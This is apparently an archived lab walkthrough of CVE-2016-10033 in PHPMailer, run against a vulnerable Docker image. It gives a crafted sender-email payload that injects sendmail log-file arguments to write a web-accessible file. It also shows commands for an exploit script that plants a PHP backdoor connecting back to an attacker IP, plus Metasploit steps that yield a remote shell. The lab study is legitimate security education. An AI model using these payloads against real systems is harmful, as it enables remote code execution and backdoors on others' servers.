关联漏洞
标题:
PHPMailer 安全漏洞
(CVE-2016-10033)
描述:PHPMailer是一个用于发送电子邮件的PHP类库。 PHPMailer 5.2.18之前的版本中的isMail transport的‘mailSend’函数存在安全漏洞,该漏洞源于程序没有设置Sender属性。远程攻击者可利用该漏洞向邮件命令中传递额外的参数,并执行任意代码。
描述
Proof Of Concept for the CVE-2016-10033 (PHPMailer)
介绍
# POC-CVE-2016-10033
First let’s get the Vulnerable application up and running
### Step 1: Run the following command to retrieve the vulnerable Docker Image from the Docker repository.
Command: `docker pull vulnerables/cve-2016-10033`
### Step 2: Running the Docker image in Docker Desktop, exposing port 8080.
You can now access the vulnerable website at localhost:8080 in the web browser.
## Method 1 : via Webpage
### Step 1: Fill in the form with the following inputs:
**Name Input:** `OSEC` (**can be any string, this does not affect the exploit**)
**Crafted Sender Email:** `"attacker\" -oQ/tmp/ -X/www/pwn.html some"@email.com`
How this crafted sender email works is explained in depth under the description section of the attack vector. As for the specific parameters the second parameter `-oQ/tmp` specifies the queue directory and the third parameter, `-X/www/pwn.html` specifies the location of the log file to be written.
If the queue directory is not specified the sendmail process would attempt to access the default mail queue directory `(/var/spool/mqueue-client/)`which would be protected to prevent unauthorized access and tampering, which is a common security measure. To avoid this permission issue, you should specify a queue directory where the user running the PHP script has write permissions. Commonly, a directory like `/tmp` is used because it is typically writable by all users.
If the body of the email contains PHP code, and if the specified log file is placed in a web-accessible directory, the attacker can execute the PHP code by accessing the log file via a web browser, hence resulting in remote code execution.
**Message Input:** This is just an example html file that an attacker could upload. Of course, the attacker could upload something much worse like a backdoor which we will be doing in the next method of exploitation
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hacked!</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.container {
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1 style="color: red;">Congratulations! You've been hacked!</h1>
<div>
<iframe src="https://giphy.com/embed/B4dt6rXq6nABilHTYM" width="480" height="452" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
<p><a href="https://giphy.com/gifs/fun-meme-hacker-B4dt6rXq6nABilHTYM"></a></p>
</div>
</div>
</body>
</html>
```
### Step 2: After submitting the form browse to the html file that we just uploaded at http://localhost:8080/pwn.html
## Method 2: via Command Line (Exploit script)
#### **Requirements**: This script is compatible with Python 2 only (it does not work with Python 3).
### Step 1: Download the exploit script at https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
### Step 2: Then run the script with the following arguments:
**Command**: `python2 /home/kali/PwnScriptum_RCE_exploit.py -url http://192.168.79.1:8080 -cf / -ip 192.168.79.149 --post-action submit --post-msg message -d /www`
**-url** -> specifies the target url
**-cf** -> specifies the location of the contact form within the url specified in `-url`. (In our case it’s the exact same as -url so we just included a slash)
**-ip** -> specifies the attcakers ip for the backdoor to connect back to
**-d** -> specifies the relative directory to upload the backdoor php file
**--post-action** -> The name attribute of the hidden field
**--post-msg** -> The name attribute of the message input field
**Note**: The reason why we have to specify --post-action to “submit” and --post-msg to “message” is because in the vulnerable application that we are using the name attribute is different from the default values used in the python exploit script
The name attributes in the vulnerable application:
The default name attributes specified in the script:
### Step 3: After we ran the command however we got an error shown below
In the above image you can see that the program is trying to access `http://127.0.0.1:8080//www/phpbackdoor9284.php` which is obviously incorrect because of `//www`. This will not work because in this vulnerable website `/www` is the website root, hence you can’t travel to `http://127.0.0.1:8080/www` since `http://127.0.0.1:8080` is already at `/www`.
Also in the below image we can see that the exploit actually worked because the phpbackdoor9284.php has been created successfully in the directory. Hence the only issue was how to remove that //www from the url.
Upon further inspection of the python script, we managed to locate the `BACKDOOR_URL` variable which specifies the URL to the backdoor php file.
In the variable we can see that a the target directory that we specified (args.TARGET_UP_DIR) is being concatenated together with the `BACKDOOR_FILE` variable.
To solve the problem, we need to remove that and the additional slash.
**Before:**
**After:**
#### **\*\*Note that the script in this repo is already modified and ready to use**
### Step 4: Now run the previous command again, and this time the backdoor should have been successfully uploaded to the web root directory and should have connected back to my kali.
## Method 3: Metasploit
### Step 1: Type msfconsole on kali terminal to open Metasploit. Then search for Metasploit modules for CVE-2016-10033. Then choose the module by choosing the index associated with it. In the below screenshot we chose 1 which targets PHPMailer < 5.2.18.
Commands:
`msfconsole`
`search CVE-2016-10033`
`use 1`
### Step 2: Set the required options for the exploit module such as the target’s IP address, port,target URL and web root.
**Commands:**
`set RHOSTS 192.168.79.1` **(specifies the target’s IP)**
`set RPORT 8080` **(specifies the target’s port)**
`set TARGETURI /`**(specifies the web form’s URL)**
`set WEB_ROOT /www` **(specifies where the website root is located)**
### Step 3: Type “exploit” to run the exploit. If all goes well you should get back a meterpreter shell of the target machine as shown below.
Command: `exploit`
We have come to the end of the POC.
# Explanation of the Exploit
PHPMailer class uses PHP `mail()` function as its default transport.
The transport is implemented using the `mailSend()` function:
If you look at line 12,
the sender address is concatenated with `-f` as per PHP documentation of the `mail()` function to tell the sendmail binary that the string after the `-f` argument is the Sender’s email address.
At the last line of the `mailSend()` function,
all the arguments that are required by the PHP `mail()` function is passed including the 5th parameter of `$params` which allows to pass extra parameters to sendmail binary.
The picture below shows the parameters that the `mail()` function takes in which matches the parameters that the `mailSend()` function passes.
As seen above we know that the `$params` string is built from the Sender variable. This is Sender string is normally set using the `setFrom()` method which validates the Sender’s address that the user types in the webform.
Due to the validateAddress() function validation, PHPMailer would for example reject a email like,
`attacker -InjectedParam2 @attacker.com`
which would prevent injection of additional parameters to Sendmail via the mail() function.
Upon further research by the founder of the CVE he realized that the validation is actually done using the RFC 3696 specification.
The RFC allows emails to contain spaces when quoted with `"`. Hence the following email address would be accepted by the `setFrom()` method:
`"Attacker -Param2 -Param3"@test.com`
Which would then be passed to the `mailSend()` function and then to the PHP `mail()` function which would then execute `/usr/bin/sendmail` , the MTA(Mail Transfer Agent) binary, with the
following list of arguments:
```
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t] (read recipients from headers)
Arg no. 2 == [-i] (ignore dots on lines)
Arg no. 3 == [-f”Attacker -Param2 -Param3”@test.com]
```
In other words like this:
which would not work for the attacker since `Param2` and `Param3` are passed within the same argument number 3 which specifies the sender’s address.
However attackers can break out of this by some extra escaping. By injecting an extra sequence of `\"` into the sender email after the first argument,
`"Attacker \" -Param2 -Param3"@test.com`
and when passed on to PHPMailer and eventually to the `mail()` function, it would execute sendmail binary with the following list of arguments
```
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
```
In other words like this:
Hence this time attackers would be able to inject additional parameters, in this case parameter 4 and 5.
## Credits
This vulnerability was found by **Dawid Golunski**.
The docker Image was created by **opsxcq** - https://github.com/opsxcq
and last but not least my lovely group members whom helped me with the POC :
**Xavion** - https://www.linkedin.com/in/xaviontok/
**Brandon** - https://www.linkedin.com/in/brandontyf/
文件快照
[4.0K] /data/pocs/b5058bf492a49f238a0f6896e2945a3a7421507a
├── [4.0K] Images
│ ├── [ 74K] after.png
│ ├── [ 66K] before.png
│ ├── [192K] docker1.png
│ ├── [ 81K] docker2.png
│ ├── [ 66K] dockerUpload.png
│ ├── [ 87K] error.png
│ ├── [10.0K] -f.png
│ ├── [ 34K] mailPara.png
│ ├── [109K] mailSendFunc.png
│ ├── [142K] metaModule.png
│ ├── [189K] metaOptions.png
│ ├── [150K] metashell.png
│ ├── [160K] nameApp.png
│ ├── [ 60K] nameSript.png
│ ├── [ 24K] phpArg.png
│ ├── [101K] phpDoc.png
│ ├── [663K] pwn.png
│ ├── [ 29K] scriptCmd.png
│ ├── [108K] scriptshell.png
│ ├── [ 93K] setFrom.png
│ ├── [ 23K] terminal1.png
│ ├── [ 24K] terminal2.png
│ └── [ 44K] vulMailForm.png
├── [8.9K] PwnScriptum_RCE_exploit-MODIFIED.py
└── [ 10K] README.md
1 directory, 25 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。